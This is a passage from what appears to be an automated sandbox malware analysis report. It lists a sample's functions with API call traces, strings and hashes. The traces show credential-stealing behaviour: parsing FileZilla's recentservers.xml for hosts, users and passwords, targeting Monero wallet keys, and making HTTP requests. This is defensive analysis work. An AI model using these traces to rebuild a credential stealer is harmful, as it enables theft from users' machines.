                                    • Opcode Fuzzy Hash: 7ff6479d516b0f3b56fc0cff9f0a20725039ceb522d483d64d030d9893ff3476
                                    • Instruction Fuzzy Hash: F33127B39082145BE3542979ED497BBBB98EB84330F2B063DEAC893B41E97949058191
                                    Function 00D15B68 Relevance: .1, Instructions: 86COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2086569824.0000000000B9E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                    • Associated: 00000000.00000002.2086323229.0000000000940000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000A22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000D20000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089244616.0000000000E3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089980560.0000000000FD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089995871.0000000000FD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_940000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 9e737847b7f8ee824912c3a9ed28930902efbb79eea0cf125100e6f8b1aa29d5
                                    • Instruction ID: ce92c48bca7e89c090d63c86e2c4e9ca7aa1d72c963a9d44dcb5dc922e5c7604
                                    • Opcode Fuzzy Hash: 9e737847b7f8ee824912c3a9ed28930902efbb79eea0cf125100e6f8b1aa29d5
                                    • Instruction Fuzzy Hash: 3E312DF290C214AFE705BF29DC426AAFBE5EF68310F06492DE6D583250E73198508B87
                                    Function 00959750 Relevance: .0, Instructions: 15COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2086356654.0000000000941000.00000040.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                    • Associated: 00000000.00000002.2086323229.0000000000940000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000A22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000D20000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089244616.0000000000E3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089980560.0000000000FD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089995871.0000000000FD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_940000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                    • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                                    • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                    • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                                    Function 00950250 Relevance: 68.6, APIs: 29, Strings: 10, Instructions: 366stringmemoryCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0095A740: lstrcpy.KERNEL32(00960E17,00000000), ref: 0095A788
                                      • Part of subcall function 00958DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00958E0B
                                      • Part of subcall function 0095A920: lstrcpy.KERNEL32(00000000,?), ref: 0095A972
                                      • Part of subcall function 0095A920: lstrcat.KERNEL32(00000000), ref: 0095A982
                                      • Part of subcall function 0095A8A0: lstrcpy.KERNEL32(?,00960E17), ref: 0095A905
                                      • Part of subcall function 0095A9B0: lstrlen.KERNEL32(?,015E8AB0,?,\Monero\wallet.keys,00960E17), ref: 0095A9C5
                                      • Part of subcall function 0095A9B0: lstrcpy.KERNEL32(00000000), ref: 0095AA04
                                      • Part of subcall function 0095A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0095AA12
                                      • Part of subcall function 0095A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0095A7E6
                                      • Part of subcall function 009499C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 009499EC
                                      • Part of subcall function 009499C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00949A11
                                      • Part of subcall function 009499C0: LocalAlloc.KERNEL32(00000040,?), ref: 00949A31
                                      • Part of subcall function 009499C0: ReadFile.KERNEL32(000000FF,?,00000000,0094148F,00000000), ref: 00949A5A
                                      • Part of subcall function 009499C0: LocalFree.KERNEL32(0094148F), ref: 00949A90
                                      • Part of subcall function 009499C0: CloseHandle.KERNEL32(000000FF), ref: 00949A9A
                                      • Part of subcall function 00958E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00958E52
                                    • GetProcessHeap.KERNEL32(00000000,000F423F,00960DBA,00960DB7,00960DB6,00960DB3), ref: 00950362
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00950369
                                    • StrStrA.SHLWAPI(00000000,<Host>), ref: 00950385
                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00960DB2), ref: 00950393
                                    • StrStrA.SHLWAPI(00000000,<Port>), ref: 009503CF
                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00960DB2), ref: 009503DD
                                    • StrStrA.SHLWAPI(00000000,<User>), ref: 00950419
                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00960DB2), ref: 00950427
                                    • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00950463
                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00960DB2), ref: 00950475
                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00960DB2), ref: 00950502
                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00960DB2), ref: 0095051A
                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00960DB2), ref: 00950532
                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00960DB2), ref: 0095054A
                                    • lstrcat.KERNEL32(?,browser: FileZilla), ref: 00950562
                                    • lstrcat.KERNEL32(?,profile: null), ref: 00950571
                                    • lstrcat.KERNEL32(?,url: ), ref: 00950580
                                    • lstrcat.KERNEL32(?,00000000), ref: 00950593
                                    • lstrcat.KERNEL32(?,00961678), ref: 009505A2
                                    • lstrcat.KERNEL32(?,00000000), ref: 009505B5
                                    • lstrcat.KERNEL32(?,0096167C), ref: 009505C4
                                    • lstrcat.KERNEL32(?,login: ), ref: 009505D3
                                    • lstrcat.KERNEL32(?,00000000), ref: 009505E6
                                    • lstrcat.KERNEL32(?,00961688), ref: 009505F5
                                    • lstrcat.KERNEL32(?,password: ), ref: 00950604
                                    • lstrcat.KERNEL32(?,00000000), ref: 00950617
                                    • lstrcat.KERNEL32(?,00961698), ref: 00950626
                                    • lstrcat.KERNEL32(?,0096169C), ref: 00950635
                                    • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00960DB2), ref: 0095068E
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2086356654.0000000000941000.00000040.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                    • Associated: 00000000.00000002.2086323229.0000000000940000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000A22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000D20000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089244616.0000000000E3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089980560.0000000000FD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089995871.0000000000FD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_940000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                                    • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                                    • API String ID: 1942843190-555421843
                                    • Opcode ID: 7bc6dd7eed89821551012c83a93fc9a6c9e09e3cd0b7a46b2db4dc60a48b8555
                                    • Instruction ID: a872fd5da1d9960cef34af9b4b9a39342563533aa81f7a8a09ff70c69d912eb2
                                    • Opcode Fuzzy Hash: 7bc6dd7eed89821551012c83a93fc9a6c9e09e3cd0b7a46b2db4dc60a48b8555
                                    • Instruction Fuzzy Hash: 74D15275900208ABDB04EBF1DD96EEE7738FF94301F444619F502A70A1EF34AA0ACB65
                                    Function 00945960 Relevance: 39.0, APIs: 17, Strings: 5, Instructions: 495networkstringmemoryCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0095A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0095A7E6
                                      • Part of subcall function 009447B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00944839
                                      • Part of subcall function 009447B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00944849
                                      • Part of subcall function 0095A740: lstrcpy.KERNEL32(00960E17,00000000), ref: 0095A788
                                    • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 009459F8
                                    • StrCmpCA.SHLWAPI(?,015EE590), ref: 00945A13
                                    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00945B93
                                    • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,015EE550,00000000,?,015E9BA8,00000000,?,00961A1C), ref: 00945E71
                                    • lstrlen.KERNEL32(00000000), ref: 00945E82
                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 00945E93
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00945E9A
                                    • lstrlen.KERNEL32(00000000), ref: 00945EAF
                                    • lstrlen.KERNEL32(00000000), ref: 00945ED8
                                    • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00945EF1
                                    • lstrlen.KERNEL32(00000000,?,?), ref: 00945F1B
                                    • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00945F2F
                                    • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00945F4C
                                    • InternetCloseHandle.WININET(00000000), ref: 00945FB0
                                    • InternetCloseHandle.WININET(00000000), ref: 00945FBD
                                    • HttpOpenRequestA.WININET(00000000,015EE450,?,015ED9E8,00000000,00000000,00400100,00000000), ref: 00945BF8
                                      • Part of subcall function 0095A9B0: lstrlen.KERNEL32(?,015E8AB0,?,\Monero\wallet.keys,00960E17), ref: 0095A9C5
                                      • Part of subcall function 0095A9B0: lstrcpy.KERNEL32(00000000), ref: 0095AA04
                                      • Part of subcall function 0095A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0095AA12
                                      • Part of subcall function 0095A8A0: lstrcpy.KERNEL32(?,00960E17), ref: 0095A905
                                      • Part of subcall function 0095A920: lstrcpy.KERNEL32(00000000,?), ref: 0095A972
                                      • Part of subcall function 0095A920: lstrcat.KERNEL32(00000000), ref: 0095A982
                                    • InternetCloseHandle.WININET(00000000), ref: 00945FC7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2086356654.0000000000941000.00000040.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                    • Associated: 00000000.00000002.2086323229.0000000000940000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000A22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000D20000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089244616.0000000000E3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089980560.0000000000FD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089995871.0000000000FD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_940000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                                    • String ID: "$"$------$------$------
                                    • API String ID: 874700897-2180234286
                                    • Opcode ID: 4cd3a61b367c5da1bb807568873744d634c9549562241dcec5ee6ea87b1e04c9
                                    • Instruction ID: 048bcac0df5493388fe9485db5b00f345c990d8dba033894d924bfe3d27100e7
                                    • Opcode Fuzzy Hash: 4cd3a61b367c5da1bb807568873744d634c9549562241dcec5ee6ea87b1e04c9
                                    • Instruction Fuzzy Hash: 2B12FF71820128ABDB15EBA1DC95FEEB378BF94701F504299B506630A1EF702E4DCF69
                                    Function 0094CEF0 Relevance: 30.4, APIs: 20, Instructions: 375stringmemoryfileCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0095A740: lstrcpy.KERNEL32(00960E17,00000000), ref: 0095A788
                                      • Part of subcall function 0095A9B0: lstrlen.KERNEL32(?,015E8AB0,?,\Monero\wallet.keys,00960E17), ref: 0095A9C5
                                      • Part of subcall function 0095A9B0: lstrcpy.KERNEL32(00000000), ref: 0095AA04
                                      • Part of subcall function 0095A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0095AA12
                                      • Part of subcall function 0095A8A0: lstrcpy.KERNEL32(?,00960E17), ref: 0095A905
                                      • Part of subcall function 00958B60: GetSystemTime.KERNEL32(00960E1A,015E9D28,009605AE,?,?,009413F9,?,0000001A,00960E1A,00000000,?,015E8AB0,?,\Monero\wallet.keys,00960E17), ref: 00958B86
                                      • Part of subcall function 0095A920: lstrcpy.KERNEL32(00000000,?), ref: 0095A972
                                      • Part of subcall function 0095A920: lstrcat.KERNEL32(00000000), ref: 0095A982
                                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0094CF83
                                    • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0094D0C7
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 0094D0CE
                                    • lstrcat.KERNEL32(?,00000000), ref: 0094D208
                                    • lstrcat.KERNEL32(?,00961478), ref: 0094D217
                                    • lstrcat.KERNEL32(?,00000000), ref: 0094D22A
                                    • lstrcat.KERNEL32(?,0096147C), ref: 0094D239
                                    • lstrcat.KERNEL32(?,00000000), ref: 0094D24C
                                    • lstrcat.KERNEL32(?,00961480), ref: 0094D25B
                                    • lstrcat.KERNEL32(?,00000000), ref: 0094D26E
                                    • lstrcat.KERNEL32(?,00961484), ref: 0094D27D
                                    • lstrcat.KERNEL32(?,00000000), ref: 0094D290
                                    • lstrcat.KERNEL32(?,00961488), ref: 0094D29F
                                    • lstrcat.KERNEL32(?,00000000), ref: 0094D2B2
                                    • lstrcat.KERNEL32(?,0096148C), ref: 0094D2C1
                                    • lstrcat.KERNEL32(?,00000000), ref: 0094D2D4
                                    • lstrcat.KERNEL32(?,00961490), ref: 0094D2E3
                                      • Part of subcall function 0095A820: lstrlen.KERNEL32(00944F05,?,?,00944F05,00960DDE), ref: 0095A82B
                                      • Part of subcall function 0095A820: lstrcpy.KERNEL32(00960DDE,00000000), ref: 0095A885
                                    • lstrlen.KERNEL32(?), ref: 0094D32A
                                    • lstrlen.KERNEL32(?), ref: 0094D339
                                      • Part of subcall function 0095AA70: StrCmpCA.SHLWAPI(015E8990,0094A7A7,?,0094A7A7,015E8990), ref: 0095AA8F
                                    • DeleteFileA.KERNEL32(00000000), ref: 0094D3B4
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2086356654.0000000000941000.00000040.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                    • Associated: 00000000.00000002.2086323229.0000000000940000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000A22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000D20000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089244616.0000000000E3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089980560.0000000000FD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089995871.0000000000FD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_940000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                                    • String ID:
                                    • API String ID: 1956182324-0
                                    • Opcode ID: 7d0854b645b764525982c39934be3bb0a36f85e6f9df4779f1d050416b919eba
                                    • Instruction ID: 31a740c02c310905b4dfcdad220967b0947175959273ea8cc0882a06294be52f
                                    • Opcode Fuzzy Hash: 7d0854b645b764525982c39934be3bb0a36f85e6f9df4779f1d050416b919eba
                                    • Instruction Fuzzy Hash: 19E123719101089BDB04EBA1DD96FEE7378BF94302F504259F507B70A1EE35AE09CB6A
                                    Function 0094C990 Relevance: 24.9, APIs: 13, Strings: 1, Instructions: 384filestringCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0095A740: lstrcpy.KERNEL32(00960E17,00000000), ref: 0095A788
                                      • Part of subcall function 0095A920: lstrcpy.KERNEL32(00000000,?), ref: 0095A972
                                      • Part of subcall function 0095A920: lstrcat.KERNEL32(00000000), ref: 0095A982
                                      • Part of subcall function 0095A8A0: lstrcpy.KERNEL32(?,00960E17), ref: 0095A905
                                      • Part of subcall function 0095A9B0: lstrlen.KERNEL32(?,015E8AB0,?,\Monero\wallet.keys,00960E17), ref: 0095A9C5
                                      • Part of subcall function 0095A9B0: lstrcpy.KERNEL32(00000000), ref: 0095AA04
                                      • Part of subcall function 0095A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0095AA12
                                    • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,015ECF48,00000000,?,0096144C,00000000,?,?), ref: 0094CA6C
                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0094CA89
                                    • GetFileSize.KERNEL32(00000000,00000000), ref: 0094CA95
                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0094CAA8
                                    • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0094CAD9
                                    • StrStrA.SHLWAPI(?,015ECF60,00960B52), ref: 0094CAF7
                                    • StrStrA.SHLWAPI(00000000,015ECF00), ref: 0094CB1E
                                    • StrStrA.SHLWAPI(?,015ED2B8,00000000,?,00961458,00000000,?,00000000,00000000,?,015E88B0,00000000,?,00961454,00000000,?), ref: 0094CCA2
                                    • StrStrA.SHLWAPI(00000000,015ED0D8), ref: 0094CCB9
                                      • Part of subcall function 0094C820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0094C871
                                      • Part of subcall function 0094C820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0094C87C
                                    • StrStrA.SHLWAPI(?,015ED0D8,00000000,?,0096145C,00000000,?,00000000,015E88D0), ref: 0094CD5A
                                    • StrStrA.SHLWAPI(00000000,015E8AF0), ref: 0094CD71
                                      • Part of subcall function 0094C820: lstrcat.KERNEL32(?,00960B46), ref: 0094C943
                                      • Part of subcall function 0094C820: lstrcat.KERNEL32(?,00960B47), ref: 0094C957
                                      • Part of subcall function 0094C820: lstrcat.KERNEL32(?,00960B4E), ref: 0094C978
                                    • lstrlen.KERNEL32(00000000), ref: 0094CE44
                                    • CloseHandle.KERNEL32(00000000), ref: 0094CE9C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2086356654.0000000000941000.00000040.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                    • Associated: 00000000.00000002.2086323229.0000000000940000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000A22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000D20000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089244616.0000000000E3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089980560.0000000000FD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089995871.0000000000FD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_940000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                                    • String ID:
                                    • API String ID: 3744635739-3916222277
                                    • Opcode ID: 02d865cdf53dbc48a43fc60ab08636cb0aaabb5dc923d5402d9b62366c38da25
                                    • Instruction ID: 59fa4e30eb71d1cd166ad450cc7420515646e631204b263be09aee6f1847628e
                                    • Opcode Fuzzy Hash: 02d865cdf53dbc48a43fc60ab08636cb0aaabb5dc923d5402d9b62366c38da25
                                    • Instruction Fuzzy Hash: 52E1F071D00108ABDB14EBA5DC95FEEB778BF94301F404259F606671A1EF306A4ECB6A
                                    Function 00958320 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 196registryCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0095A740: lstrcpy.KERNEL32(00960E17,00000000), ref: 0095A788
                                    • RegOpenKeyExA.ADVAPI32(00000000,015EABA0,00000000,00020019,00000000,009605B6), ref: 009583A4
                                    • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00958426
                                    • wsprintfA.USER32 ref: 00958459
                                    • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0095847B
                                    • RegCloseKey.ADVAPI32(00000000), ref: 0095848C
                                    • RegCloseKey.ADVAPI32(00000000), ref: 00958499
                                      • Part of subcall function 0095A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0095A7E6
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2086356654.0000000000941000.00000040.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                    • Associated: 00000000.00000002.2086323229.0000000000940000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000A22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000D20000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089244616.0000000000E3B000.00000080.00000001.01000000.00000003.sdmpDownload File
